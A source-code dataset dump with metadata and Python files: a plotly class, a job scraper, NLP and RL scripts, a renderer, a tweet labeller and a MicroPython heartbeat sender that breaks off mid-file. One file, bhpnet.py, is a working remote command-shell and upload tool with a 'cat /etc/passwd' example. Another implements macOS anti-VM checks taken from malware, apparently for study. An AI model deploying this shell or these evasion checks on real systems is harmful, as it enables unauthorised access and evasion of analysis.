blob_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| path
stringlengths 3
281
| content_id
stringlengths 40
40
| detected_licenses
listlengths 0
57
| license_type
stringclasses 2
values | repo_name
stringlengths 6
116
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| branch_name
stringclasses 313
values | visit_date
timestamp[us] | revision_date
timestamp[us] | committer_date
timestamp[us] | github_id
int64 18.2k
668M
⌀ | star_events_count
int64 0
102k
| fork_events_count
int64 0
38.2k
| gha_license_id
stringclasses 17
values | gha_event_created_at
timestamp[us] | gha_created_at
timestamp[us] | gha_language
stringclasses 107
values | src_encoding
stringclasses 20
values | language
stringclasses 1
value | is_vendor
bool 2
classes | is_generated
bool 2
classes | length_bytes
int64 4
6.02M
| extension
stringclasses 78
values | content
stringlengths 2
6.02M
| authors
listlengths 1
1
| author
stringlengths 0
175
|
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
89a33a2d2fb2a28b98436986b935fd4cbc7f20a7
|
37fef592f365194c28579f95abd222cc4e1243ae
|
/streamlit/venv/venv/lib/python3.7/site-packages/plotly/graph_objs/splom/marker/colorbar/_tickformatstop.py
|
a3a8adde9676f505e52d3465cbd3ee72ce684873
|
[] |
no_license
|
edimaudo/Python-projects
|
be61e0d3fff63fb7bd00513dbf1401e2c1822cfb
|
85d54badf82a0b653587a02e99daf389df62e012
|
refs/heads/master
| 2023-04-07T03:26:23.259959 | 2023-03-24T12:03:03 | 2023-03-24T12:03:03 | 72,611,253 | 4 | 3 | null | 2022-10-31T18:10:41 | 2016-11-02T06:37:17 | null |
UTF-8
|
Python
| false | false | 9,564 |
py
|
from plotly.basedatatypes import BaseTraceHierarchyType as _BaseTraceHierarchyType
import copy as _copy
class Tickformatstop(_BaseTraceHierarchyType):
# class properties
# --------------------
_parent_path_str = "splom.marker.colorbar"
_path_str = "splom.marker.colorbar.tickformatstop"
_valid_props = {"dtickrange", "enabled", "name", "templateitemname", "value"}
# dtickrange
# ----------
@property
def dtickrange(self):
"""
range [*min*, *max*], where "min", "max" - dtick values which
describe some zoom level, it is possible to omit "min" or "max"
value by passing "null"
The 'dtickrange' property is an info array that may be specified as:
* a list or tuple of 2 elements where:
(0) The 'dtickrange[0]' property accepts values of any type
(1) The 'dtickrange[1]' property accepts values of any type
Returns
-------
list
"""
return self["dtickrange"]
@dtickrange.setter
def dtickrange(self, val):
self["dtickrange"] = val
# enabled
# -------
@property
def enabled(self):
"""
Determines whether or not this stop is used. If `false`, this
stop is ignored even within its `dtickrange`.
The 'enabled' property must be specified as a bool
(either True, or False)
Returns
-------
bool
"""
return self["enabled"]
@enabled.setter
def enabled(self, val):
self["enabled"] = val
# name
# ----
@property
def name(self):
"""
When used in a template, named items are created in the output
figure in addition to any items the figure already has in this
array. You can modify these items in the output figure by
making your own item with `templateitemname` matching this
`name` alongside your modifications (including `visible: false`
or `enabled: false` to hide it). Has no effect outside of a
template.
The 'name' property is a string and must be specified as:
- A string
- A number that will be converted to a string
Returns
-------
str
"""
return self["name"]
@name.setter
def name(self, val):
self["name"] = val
# templateitemname
# ----------------
@property
def templateitemname(self):
"""
Used to refer to a named item in this array in the template.
Named items from the template will be created even without a
matching item in the input figure, but you can modify one by
making an item with `templateitemname` matching its `name`,
alongside your modifications (including `visible: false` or
`enabled: false` to hide it). If there is no template or no
matching item, this item will be hidden unless you explicitly
show it with `visible: true`.
The 'templateitemname' property is a string and must be specified as:
- A string
- A number that will be converted to a string
Returns
-------
str
"""
return self["templateitemname"]
@templateitemname.setter
def templateitemname(self, val):
self["templateitemname"] = val
# value
# -----
@property
def value(self):
"""
string - dtickformat for described zoom level, the same as
"tickformat"
The 'value' property is a string and must be specified as:
- A string
- A number that will be converted to a string
Returns
-------
str
"""
return self["value"]
@value.setter
def value(self, val):
self["value"] = val
# Self properties description
# ---------------------------
@property
def _prop_descriptions(self):
return """\
dtickrange
range [*min*, *max*], where "min", "max" - dtick values
which describe some zoom level, it is possible to omit
"min" or "max" value by passing "null"
enabled
Determines whether or not this stop is used. If
`false`, this stop is ignored even within its
`dtickrange`.
name
When used in a template, named items are created in the
output figure in addition to any items the figure
already has in this array. You can modify these items
in the output figure by making your own item with
`templateitemname` matching this `name` alongside your
modifications (including `visible: false` or `enabled:
false` to hide it). Has no effect outside of a
template.
templateitemname
Used to refer to a named item in this array in the
template. Named items from the template will be created
even without a matching item in the input figure, but
you can modify one by making an item with
`templateitemname` matching its `name`, alongside your
modifications (including `visible: false` or `enabled:
false` to hide it). If there is no template or no
matching item, this item will be hidden unless you
explicitly show it with `visible: true`.
value
string - dtickformat for described zoom level, the same
as "tickformat"
"""
def __init__(
self,
arg=None,
dtickrange=None,
enabled=None,
name=None,
templateitemname=None,
value=None,
**kwargs,
):
"""
Construct a new Tickformatstop object
Parameters
----------
arg
dict of properties compatible with this constructor or
an instance of :class:`plotly.graph_objs.splom.marker.c
olorbar.Tickformatstop`
dtickrange
range [*min*, *max*], where "min", "max" - dtick values
which describe some zoom level, it is possible to omit
"min" or "max" value by passing "null"
enabled
Determines whether or not this stop is used. If
`false`, this stop is ignored even within its
`dtickrange`.
name
When used in a template, named items are created in the
output figure in addition to any items the figure
already has in this array. You can modify these items
in the output figure by making your own item with
`templateitemname` matching this `name` alongside your
modifications (including `visible: false` or `enabled:
false` to hide it). Has no effect outside of a
template.
templateitemname
Used to refer to a named item in this array in the
template. Named items from the template will be created
even without a matching item in the input figure, but
you can modify one by making an item with
`templateitemname` matching its `name`, alongside your
modifications (including `visible: false` or `enabled:
false` to hide it). If there is no template or no
matching item, this item will be hidden unless you
explicitly show it with `visible: true`.
value
string - dtickformat for described zoom level, the same
as "tickformat"
Returns
-------
Tickformatstop
"""
super(Tickformatstop, self).__init__("tickformatstops")
if "_parent" in kwargs:
self._parent = kwargs["_parent"]
return
# Validate arg
# ------------
if arg is None:
arg = {}
elif isinstance(arg, self.__class__):
arg = arg.to_plotly_json()
elif isinstance(arg, dict):
arg = _copy.copy(arg)
else:
raise ValueError(
"""\
The first argument to the plotly.graph_objs.splom.marker.colorbar.Tickformatstop
constructor must be a dict or
an instance of :class:`plotly.graph_objs.splom.marker.colorbar.Tickformatstop`"""
)
# Handle skip_invalid
# -------------------
self._skip_invalid = kwargs.pop("skip_invalid", False)
self._validate = kwargs.pop("_validate", True)
# Populate data dict with properties
# ----------------------------------
_v = arg.pop("dtickrange", None)
_v = dtickrange if dtickrange is not None else _v
if _v is not None:
self["dtickrange"] = _v
_v = arg.pop("enabled", None)
_v = enabled if enabled is not None else _v
if _v is not None:
self["enabled"] = _v
_v = arg.pop("name", None)
_v = name if name is not None else _v
if _v is not None:
self["name"] = _v
_v = arg.pop("templateitemname", None)
_v = templateitemname if templateitemname is not None else _v
if _v is not None:
self["templateitemname"] = _v
_v = arg.pop("value", None)
_v = value if value is not None else _v
if _v is not None:
self["value"] = _v
# Process unknown kwargs
# ----------------------
self._process_kwargs(**dict(arg, **kwargs))
# Reset skip_invalid
# ------------------
self._skip_invalid = False
|
[
"[email protected]"
] | |
37be2dd7a036a0d6c20d49738fb4226536c20ac2
|
ff21f04b692891b13fa2ed49293e5d99fea742db
|
/hunt/scripts/job_spider.py
|
41015307bdb3af0ba459f972c27a7bd7b13714fd
|
[] |
no_license
|
yangby-cryptape/job-hunter
|
3caf49c9290a077661c8e245565132e2a8671c05
|
1b58b2f23ac7d1aba08feaff29692adb8fe58161
|
refs/heads/master
| 2021-05-27T17:35:09.370516 | 2012-06-25T07:38:06 | 2012-06-25T07:38:06 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 6,263 |
py
|
#!/usr/bin/env python
#coding=utf-8
import hashlib, urllib2, time, re
from datetime import datetime
from pyquery import PyQuery as pq
from models import db, Occupational, Job, Company
def get_headers(gzip=False):
headers = {
"User-Agent":"Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13",
# "User-Agent": "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.13) Gecko/20101206 Ubuntu/10.10 (maverick) Firefox/3.6.13"
"Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
"Accept-Language":"zh-cn,zh;q=0.5",
# "Accept-Encoding":"gzip,deflate",
"Accept-Charset":"utf-8;q=0.7,*;q=0.7",
"Keep-Alive":"115",
"Connection":"keep-alive",
# "Host":"",
# "Referer":"",
}
if gzip:
headers["Accept-Encoding"] = "gzip,deflate"
return headers
def getDomFromUrl(url):
req = urllib2.Request(
url = url,
headers = get_headers())
try:
request = urllib2.urlopen(req)
source = request.read()
request.close()
except Exception, e:
source = None
print e
ucontent = source.decode('utf-8')
dom = pq(ucontent)
return dom
def getCompanyInfo(dom):
'''获取一个公司的信息'''
info_items = dom('.companyInfoItems')
info_trs = info_items('.companyInfoTab tr')
company_info = {}
for tr in info_trs:
tr = pq(tr)
k = tr('td:eq(0)').text().split(u':')[0]
v = tr('td:eq(1)').text()
company_info[k] = v
scale = company_info.get(u'公司规模')
if scale:
sh = re.search(r'(\d+)-(\d+)', scale)
scale = sh.groups() if sh else (None, None)
else:
scale = (None, None)
####
jcs = dom('.jobContact>div>div').find('div') # Job Contact
for jc in jcs:
jc = pq(jc)
jctext = jc.text().split(u':')
if len(jctext) == 2:
k, v = jctext
company_info[k] = v
com = Company()
com.name = info_items('.companyTitle').text()
com.industry = company_info.get(u'公司行业')
com.type = company_info.get(u'公司类型')
com.address = company_info.get(u'公司地址')
com.website = company_info.get(u'公司主页')
com.scale_low, com.scale_high = scale
com.email = None
com.phone_num = None
com.description = dom('.black12 tr:eq(2)').find('td').html()
com.etag = ''
return com
def getJobInfo(dom, company):
'''获取一个职位的招聘信息'''
job_info = {}
type_tr = dom('.jobInfoItems tr:eq(0)')
trtext = type_tr.text()
trtext = trtext.split(u':') if trtext else []
if len(trtext) == 2:
k, v = trtext
v = v.replace('/', ',')
job_info[k] = v
trs = dom('.jobInfoItems tr:gt(1)')
for tr in trs:
tr = pq(tr)
tds = tr('td')
for td in tds:
td = pq(td)
tdtext = td.text().split(u':')
if len(tdtext) == 2:
k, v = tdtext
job_info[k] = v
salary = job_info.get(u'职位月薪')
if salary:
sh = re.search(r'(\d+)-(\d+)', salary)
salary = sh.groups() if sh else (None, None)
else:
salary = (None, None)
quantity = job_info.get(u'招聘人数')
if quantity:
sh = re.search(r'(\d+)', quantity)
quantity = sh.group(0) if sh else None
job = Job()
occ_type = job_info.get(u'职位类别')
occ = Occupational.query.filter(Occupational.type==occ_type).first()
if not occ:
occ = Occupational()
occ.name = 'FILL'
occ.type = occ_type
db.session.add(occ)
job.occupational = occ
job.type = job_info.get(u'工作性质')
job.exp = job_info.get(u'工作经验')
job.manage_exp = job_info.get(u'管理经验')
job.quantity = quantity
job.degree = job_info.get(u'最低学历')
job.salary_low, job.salary_high = salary
job.description = dom('.jobDes').html()
job.etag = ''
return job
def getPage(page_num):
time.sleep(0.6)
dom = getDomFromUrl('http://sou.zhaopin.com/jobs/jobsearch_jobtype.aspx?bj=160000&sj=045%3B079&jl=%E6%9D%AD%E5%B7%9E&sb=1&sm=0&p=' + page_num)
table = dom('#contentbox table:eq(1)')
trs = table('tr:gt(0)')
iseven = True
for tr in trs:
if iseven:
tr = pq(tr)
job_title = tr('#dvJobTit').text()
job_url = tr('#dvJobTit a').attr('href')
company_name = tr('#dvCompNM').text()
company_url = tr('#dvCompNM a').attr('href')
work_place = tr('td:eq(4)').text().split(' - ')
work_city = work_place[0]
work_area = work_place[1] if len(work_place) > 1 else None
public_date = tr('td:eq(5)').text()
time.sleep(0.6)
job_detail_dom = getDomFromUrl(job_url)
company = getCompanyInfo(job_detail_dom)
company.zhaopin_url = company_url
db.session.add(company)
job = getJobInfo(job_detail_dom, company)
job.company = company
job.title = job_title
job.work_city = work_city
job.work_area = work_area
job.public_date = public_date
job.zhaopin_url = job_url
db.session.add(job)
db.session.commit()
print datetime.now()
print 'This is Job %d' % job.id
iseven = not iseven
total_page = dom('.pagehead .num:eq(1)').text()
sh = re.search(r'(\d+)/(\d+)', total_page)
current_page, total_page = sh.groups() if sh else (None, None)
return int(current_page), int(total_page)
def doSpider():
print datetime.now()
print 'Start Get First page'
current_page, total_page = getPage('1')
print 'First page, Done!'
print 'Total page: %d\n' % total_page
for page_num in range(current_page+1, total_page+1):
print datetime.now()
print 'Start get page: [%d]' % page_num
getPage(str(page_num))
print 'page: [%d], Done!\n' % page_num
if __name__ == '__main__':
print 'BEGIN TEST'
doSpider()
print 'TEST DONE'
|
[
"[email protected]"
] | |
ce6a731a6ac5188de720f8067367151a6da5e6f5
|
080f170a3ff105a15416a595787efabf0ccd1061
|
/tests/environment.py
|
0dde8bddf628c6e04e785eb4bf1ef57fd8c43795
|
[] |
no_license
|
JKCooper2/rlagents
|
16c3eaaf8bd06878e62e94e53338280398c15193
|
652bc4bcfb2426d7d3d437867f0e4ef33838a6c4
|
refs/heads/master
| 2020-04-11T01:28:44.833663 | 2016-09-07T09:02:11 | 2016-09-07T09:02:11 | 60,885,615 | 0 | 1 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,555 |
py
|
from rlagents.env_manager import EnvManager
from rlagents.agent_manager import AgentManager
from rlagents.agents import Agent
from rlagents.models import WeightedLinearModel, TabularModel
from rlagents.function_approximation import DefaultFA, DiscreteMaxFA, SingleTiling
from rlagents.memory import ListMemory, PandasMemory
from rlagents.exploration import DefaultExploration, EpsilonGreedy
from rlagents.optimisation import DefaultOptimiser, TemporalDifference, MonteCarlo
from rlagents.functions.decay import FixedDecay
def main():
agent = Agent(model=TabularModel(mean=1, std=0.00),
action_fa=DiscreteMaxFA(),
observation_fa=SingleTiling(num_tiles=8),
memory=PandasMemory(size=1, columns=['observations', 'actions', 'rewards', 'done', 'new_obs']),
exploration=EpsilonGreedy(FixedDecay(0.5, 0.99, 0.05)),
optimiser=MonteCarlo(learning_rate=FixedDecay(0.2, 1, 0.02)))
# agent = Agent(model=TabularModel(mean=1, std=0),
# action_fa=DiscreteMaxFA(),
# observation_fa=DefaultFA(),
# memory=PandasMemory(size=20, columns=['observations', 'actions', 'rewards', 'done', 'new_obs']),
# exploration=EpsilonGreedy(FixedDecay(1, 0, 1)),
# optimiser=TemporalDifference(learning_rate=FixedDecay(0.1, 1, 0.1)))
am = AgentManager(agent=agent)
em = EnvManager('CartPole-v0', am)
em.run(n_episodes=500, video_callable=None)
if __name__ == "__main__":
main()
|
[
"[email protected]"
] | |
52b6a665d04a47791c6b96f1ac90d1a98523b7ac
|
2bd3f4104ab1cbca1cf9a529df53c131f7f82c0f
|
/get_nltk_corpus.py
|
51af25f7682fee3329741ea066b1cc10658fca68
|
[] |
no_license
|
Wingtail/next_word_prediction
|
c01c007c056e696090c973af3b695ba3de891fa6
|
5362c3e1e864545b2651477d440b113f7e407bb1
|
refs/heads/main
| 2023-02-28T18:58:17.364457 | 2021-02-06T08:26:07 | 2021-02-06T08:26:07 | 334,380,067 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,314 |
py
|
from nltk.corpus import gutenberg, brown, nps_chat, webtext
import os
def get_gutenberg():
#Gutenberg corpus
for fileid in gutenberg.fileids():
print("Gutenberg fileid: ", fileid)
with open("./text_data/"+fileid, "w") as f:
f.write(gutenberg.raw(fileid))
def get_brown():
for fileid in brown.fileids():
print("Brown fileid: ", fileid)
raw_text = brown.words(fileid)
raw_text = ' '.join(raw_text)
with open("./text_data/"+fileid+".txt", "w") as f:
f.write(raw_text)
def get_web_text():
for fileid in webtext.fileids():
print("Webtext fileid: ", fileid)
raw_text = webtext.words(fileid)
raw_text = ' '.join(raw_text)
with open("./text_data/"+fileid+".txt", "w") as f:
f.write(raw_text)
def get_nps_chat():
for fileid in nps_chat.fileids():
print("Npschat fileid: ", fileid)
raw_text = nps_chat.words(fileid)
raw_text = ' '.join(raw_text)
with open("./text_data/"+fileid+".txt", "w") as f:
f.write(raw_text)
def main():
if not os.path.exists("./text_data/"):
os.makedirs("./text_data/", exist_ok=True)
# get_gutenberg()
# get_brown()
get_web_text()
get_nps_chat()
if __name__ == "__main__":
main()
|
[
"[email protected]"
] | |
87e4d72a1446c5d8ab1dc77fc9c1479275a6d6d8
|
580130b81a4e1815fb0fda9351d164cfdd279e44
|
/src/anti-vm/macOS/vm-check.py
|
6776c4fec84bb4c39fe5b10e5051031599075aa0
|
[
"MIT"
] |
permissive
|
Roblinks/malware-techniques
|
58b272a10369af587bd9808bf532ea84c743c444
|
2a74265bc74569a4e053d8406ade174e2cdc0a6c
|
refs/heads/master
| 2023-03-17T14:09:06.778972 | 2019-06-15T02:27:03 | 2019-06-15T02:27:03 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,613 |
py
|
# Different implementations of these mac virtualization detection techniques were used in OSX/MacRansom.
# Objective-See's analysis of this malware can be found here: https://objective-see.com/blog/blog_0x1E.html
# I found his work incredibly helpful as I was researching macOS malware.
import sys
sys.path.insert(0, "../..")
from utils.print import *
from utils.utils import run_cmd
def check_hardware_model():
"""
On a real Mac, when the system is queried for the model, it will return
something like this: "hw.model: MacBookPro14,2", but on a VM it will
return something like 'VMware7,1'
"""
print_blue("Hardware Model Test...")
hardware_model = run_cmd("sysctl hw.model").stdout.decode()
if "Mac" not in hardware_model.split()[1]:
print_red("Running on a VM.")
else:
print_green("Running on a real Mac.")
def check_logical_physical_cpu_ratio():
"""
A ratio of logical CPUs to physical CPUs that equals 1 may indicate
a virtualized Mac environment.
Real Mac:
$ sysctl -n hw.logicalcpu
4
$ sysctl -n hw.physicalcpu
2
In VM:
$ sysctl -n hw.logicalcpu
2
$ sysctl -n hw.physicalcpu
2
"""
print_blue("Physical vs. Logical CPU Count Test...")
logical_cpu_count = int(run_cmd("sysctl -n hw.logicalcpu").stdout.decode())
physical_cpu_count = int(run_cmd("sysctl -n hw.physicalcpu").stdout.decode())
if logical_cpu_count == physical_cpu_count:
print_red("Running on a VM.")
else:
print_green("Running on a real Mac.")
def ioreg_check():
"""
Uses ioreg command to check for references to any virtualization software
in the macOS I/O Kit registry.
You can find a real world example of this in OSX.FairyTale, which can be
downloaded from the Objective-See archives here: https://objective-see[.]com/downloads/malware/FairyTale.zip
WARNING: THIS LINK DOWNLOADS LIVE MALWARE.
"""
print_blue("ioreg Test...")
result = run_cmd("ioreg | grep -i -e \"vmware\" -e \"virtualbox\" -e \"parallels\" -e \"qemu\"").stdout.decode()
if len(result) == 0:
print_green("No virtualization software detected.")
else:
print_red("Virtualization software detected.")
def main():
check_hardware_model()
check_logical_physical_cpu_ratio()
ioreg_check()
if __name__ == '__main__':
main()
|
[
"[email protected]"
] | |
721d597cb8cb7b5d1b57d3e2e737f41435039559
|
0e2c0daf7d7cd3f5b90e41777d482f9d5bf07fab
|
/black_hat/bhpnet.py
|
a12954a7360212c207a0aa209bcf3aa0c36a9a99
|
[] |
no_license
|
jeffersonvivanco/Python_Notes
|
d7ec6202de50b99dfe0525e16758b5ac1e978d75
|
abc83311644c166484de48b130eae4971cf91733
|
refs/heads/master
| 2020-03-29T08:13:15.142037 | 2019-12-13T00:19:11 | 2019-12-13T00:19:11 | 94,665,904 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 6,360 |
py
|
import sys, socket, getopt, threading, subprocess
# Todo: Look up subprocess library
# define some global variables
listen = False
command = False
upload = False
execute = ''
target = ''
upload_destination = ''
port = 0
def usage():
print('BHP Net Tool\n')
print('Usage: bhpnet.py -t target_host -p port')
print('-l --listen\t\t\t- listen on [host]:[port] for incoming connections')
print('-e --execute=file_to_run\t\t\t- execute the given file upon receiving a connection')
print('-c --command\t\t\t-initialize a command shell')
print('-u --upload=destination\t\t\t- upon receiving connection upload a file and write to [destination]\n\n')
print('Examples:')
print('bhpnet.py -t 192.168.0.1 -p 5555 -l -c')
print('bhpnet.py -t 192.168.0.1 -p 5555 -l -u=c:\\target.exe')
print('bhpnet.py -t 192.168.0.1 -p 5555 -l -e="cat /etc/passwd"')
print('echo "ABCDEFGHI" | ./bhpnet.py -t 192.168.0.1 -p 135')
sys.exit(0)
def client_sender(buffer):
client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
# connect to our target host
client.connect((target, port))
print('[Debug] file: bhpnet.py; method: client_sender; buffer is ' + buffer)
if len(buffer):
print('[Debug] file: bhpnet.py; method: client_sender; buffer is ' + buffer)
client.send(buffer.encode())
while True:
# now wait for data back
recv_len = 1
response = ''
while recv_len:
data = client.recv(4096).decode()
recv_len = len(data)
response += data
if recv_len < 4096:
break
print(response)
# wait for more input
buffer = input('')
buffer += '\n'
# send it off
client.send(buffer.encode())
except:
print('[*] Exception exiting.')
# tear down the connection
client.close()
def server_loop():
global target
# if no target is defined, we listen on all interfaces
if not len(target):
target = '0.0.0.0'
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server.bind((target, port))
server.listen(5)
while True:
client_socket, addr = server.accept()
# spin off a thread to handle our new client
client_thread = threading.Thread(target=client_handler, args=(client_socket,))
client_thread.start()
def run_command(command):
# trim the newline
command = command.rstrip()
# run the command and get the output back
try:
output = subprocess.check_output(command, stderr=subprocess.STDOUT, shell=True)
except:
output = 'Failed to execute command.\r\n'
# send output back to the client
return output
# logic to do file uploads, command execution, and our shell
def client_handler(client_socket):
global upload
global execute
global command
# check for upload
# Responsible for determining whether our network tool is set to receive a file
# when it receives a connection
if len(upload_destination):
# read in all of the bytes and write to our destination
file_buffer = ''
# keep reading data until none is available
while True:
data = client_socket.recv(1024).decode()
if not data:
break
else:
file_buffer += data
# now we take these bytes and try to write them out
try:
# the wb flag ensures that we are writing a file with binary mode enabled,
# which ensures that uploading and writing a binary executable will be successfully
file_descriptor = open(upload_destination, 'wb')
file_descriptor.write(file_buffer)
file_descriptor.close()
# awknowledge that we wrote the file out
client_socket.send(('Successfully saved file to %s\r\n' % upload_destination).encode())
except:
client_socket.send(('Failed to save file to %s\r\n' % upload_destination).encode())
# check for command execution
if len(execute):
# run the command
output = run_command(execute)
client_socket.send(output.encode())
# now we go into another loop if a command shell was requested
if command:
while True:
# show a simple prompt
client_socket.send('<BHP:#> '.encode())
# now we receive until we see a linefeed (enter key)
cmd_buffer = ''
while '\n' not in cmd_buffer:
cmd_buffer += client_socket.recv(1024).decode()
# send back the command output
response = run_command(cmd_buffer)
# send back the response
client_socket.send(response)
def main():
global listen
global port
global execute
global command
global upload_destination
global target
if not len(sys.argv[1:]):
usage()
# read the commandline options
try:
opts, args = getopt.getopt(sys.argv[1:], 'hle:t:p:cu:', ['help', 'listen', 'execute', 'target', 'port', 'command', 'upload'])
except getopt.GetoptError as err:
print(err)
usage()
for o,a in opts:
if o in ('-h','--help'):
usage()
elif o in ('-l', '--listen'):
listen = True
elif o in ('-e', '--execute'):
execute = a
elif o in ('-c', '--commandshell'):
command = True
elif o in ('-u', '--upload'):
upload_destination = a
elif o in ('-t', '--target'):
target = a
elif o in ('-p', '--port'):
port = int(a)
else:
assert False, 'Unhandled Option'
# are we going to listen or just send data from stdin?
if not listen and len(target) and port > 0:
# read the buffer from the commandline
# this will block, so send ctrl-d if not sending input to stdin
buffer = sys.stdin.read()
# send data off
client_sender(buffer)
# we are going to listen and potentially upload things, execute commands, and drop a shell back
# depending on our command line options above
if listen:
server_loop()
main()
|
[
"[email protected]"
] | |
8e2e47bdb27846e3b8e47cb2a5cef061a461040d
|
f75221bac60808f81fdee9962d2cdd72f99260f6
|
/src/renderer.py
|
4aadb0fb60907b4f676fc9672a5974975722cc9d
|
[
"MIT"
] |
permissive
|
pennomi/nihil-ace
|
8d6038f7bff63e62c0e7ff65cce1effa0d514216
|
cde9891e6b825089b466b4f10282036f52056a2a
|
refs/heads/master
| 2021-01-10T05:32:59.299479 | 2013-10-10T23:55:42 | 2013-10-10T23:55:42 | 8,436,087 | 1 | 1 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,526 |
py
|
from pymunk.vec2d import Vec2d
from pyglet import gl
from space import SPACE
SCREEN_WIDTH = 1000
SCREEN_HEIGHT = 700
SCREEN_CENTER = Vec2d(SCREEN_WIDTH/2, SCREEN_HEIGHT/2)
SCREEN_BUFFER = 16
def off_screen(point):
p = adjust_for_cam(point)
scale = SPACE.scale
b = SCREEN_BUFFER * scale
if (p.x < -b or p.y < -b or
p.x > SCREEN_WIDTH + b or
p.y > SCREEN_HEIGHT + b):
return True
return False
def adjust_for_cam(point):
return (point - SPACE.last_pos) * SPACE.scale + SCREEN_CENTER
def inverse_adjust_for_cam(point):
return (point - SCREEN_CENTER) / SPACE.scale + SPACE.last_pos
def draw_rect(texture, points, direction=0, use_cam=True):
# Set the texture
gl.glEnable(gl.GL_TEXTURE_2D)
gl.glBindTexture(gl.GL_TEXTURE_2D, texture)
# Allow alpha blending
gl.glEnable(gl.GL_BLEND)
gl.glBlendFunc(gl.GL_SRC_ALPHA, gl.GL_ONE_MINUS_SRC_ALPHA)
# draw
gl.glBegin(gl.GL_QUADS)
for i, vert in enumerate(points):
b = (i + direction) % 4 # render according to the direction
if use_cam:
x, y = adjust_for_cam(vert)
else:
x, y = vert
texture = b // 2, ((b + 1) // 2) % 2
gl.glTexCoord2f(*texture)
gl.glVertex3f(x, y, 0)
gl.glEnd()
def draw_large_point(texture, p, r):
draw_rect(texture, [Vec2d(p.x - r, p.y - r),
Vec2d(p.x + r, p.y - r),
Vec2d(p.x + r, p.y + r),
Vec2d(p.x - r, p.y + r),])
|
[
"[email protected]"
] | |
2ac6b76fcb536907f37c5e2b85d1aa4c1145f25d
|
c8cd0d24b50da3497133799c2612bea3108f09b9
|
/sentiment-analysis/src/labeler.py
|
7060b5289ce0301dd898a00252b67fdb52177de2
|
[] |
no_license
|
TravisDunlop/colombia-elections-twitter
|
d61e08e4bbeb3a6357faee30f17d7037112eeb34
|
df42d536ed27a9f9cb65d9c61d0fd9b6e35d4217
|
refs/heads/master
| 2020-03-16T03:53:34.196212 | 2018-05-19T15:10:35 | 2018-05-19T15:10:35 | 132,498,270 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,387 |
py
|
import pandas as pd
import numpy as np
import os
import json
import re
import gc
import pickle
pd.set_option('display.max_colwidth', -1)
pd.set_option('display.float_format', lambda x: '%.0f' % x)
data_path = "/home/juan/Desktop/Text_Mining/Om_Project/Data"
tables_path = "/home/juan/Desktop/Text_Mining/Om_Project/colombia-elections-twitter/sentiment-analysis/tables"
# reader_ = pd.read_csv ( os.path.join( data_path,"db_tweets.csv" ) , sep = "|", lineterminator = '\n')
# data_ = reader_.sample(5000)
# data_.to_csv(os.path.join(data_path,"data_labeling.csv"),index=False,sep='|')
# del reader_
data_labels = pd.read_csv ( os.path.join( data_path,"data_labeling.csv" ) ,
sep = "|",
lineterminator = '\n' )
#
# sentiment_label = []
# tweet_id = []
#
# with open(os.path.join(data_path,"sentiment_labels"), 'wb') as fp:
# pickle.dump(sentiment_label, fp)
# fp.close()
# with open(os.path.join(data_path,"tweet_id"), 'wb') as fp:
# pickle.dump(tweet_id, fp)
# fp.close()
with open(os.path.join(tables_path,"sentiment_labels"), 'rb') as fp:
sentiment_label = pickle.load(fp)
fp.close()
with open(os.path.join(tables_path,"tweet_id"), 'rb') as fp:
tweet_id = pickle.load(fp)
fp.close()
if len(tweet_id)!=0:
start = data_labels.index[ data_labels.tweet_id == tweet_id[-1]].tolist()[0]+1
else:
start = 0
data_labels = data_labels.iloc [ start: , : ]
# data_labels.columns
for i in range( data_labels.shape[0] ):
print(data_labels.iloc[i,:][["created_at","text_tweet","hashtags","user_description","screen_name"]])
label = []
while label not in ["0", "1","99","END"]:
label = input ( "\n\n#####\nlabels:\n1-positive\n0-negative\n99-unclear/neutral\n------\nbreak it with 'END': " )
if label == "END":
break
else:
sentiment_label.append( int( label ) )
tweet_id.append( data_labels.tweet_id.iloc[i] )
print ( "__________" )
with open(os.path.join(tables_path,"sentiment_labels"), 'wb') as fp:
pickle.dump(sentiment_label, fp)
fp.close()
with open(os.path.join(tables_path,"tweet_id"), 'wb') as fp:
pickle.dump(tweet_id, fp)
fp.close()
# i = np.random.randint(low=0,high = 6)
# j = 0
# for chunk in reader_:
# if j == i:
# break
# j=+1
#
# my_df_chunk = chunk.sample(2000)[["tweet_id","text_tweet","user_description"]]
|
[
"[email protected]"
] | |
531883721f517129ade5b59be0c33d3e18cdb738
|
7717039d2c8ace6250282b76bf6b0b3ced7bf241
|
/tests/urequests+requests测试/掌控板urequests heartbeat post测试(oled显示).py
|
a27c5834a99329dbb16591941b13e07a9fbc64b8
|
[
"MIT"
] |
permissive
|
SZ2G-RoboticsClub/SmartCrutch-DemoBoard
|
ae07c80d51f554b09ad99852c03f85dd04c42615
|
0d32acc9c934b384612a721ecde0259c8d90a82d
|
refs/heads/main
| 2023-09-01T07:39:17.465666 | 2021-10-17T02:37:10 | 2021-10-17T02:37:10 | 347,536,775 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,225 |
py
|
from mpython import *
import urequests
import network
import time
# import ntptime
my_wifi = wifi()
my_wifi.connectWiFi('QFCS-MI', '999999999')
# ntptime.settime(8, "time.windows.com")
oled.fill(0)
oled.DispChar('初始化成功', 0, 0)
oled.show()
BASE_URL = 'http://192.168.31.132:8000/demoboard'
uuid = 'dytest'
status = 'ok'
# heartbeat_Loc = None
# heartbeat_time = None
time_set = None
lock = 0
def heartbeat():
global uuid, status, heartbeat_Loc, heartbeat_time, data, resp
data = { #心跳包数据存储
"uuid": uuid,
"status": status,
"loc": heartbeat_Loc
}
print(data)
resp = urequests.post(url=BASE_URL+'/heartbeat', json=data) #发送心跳包
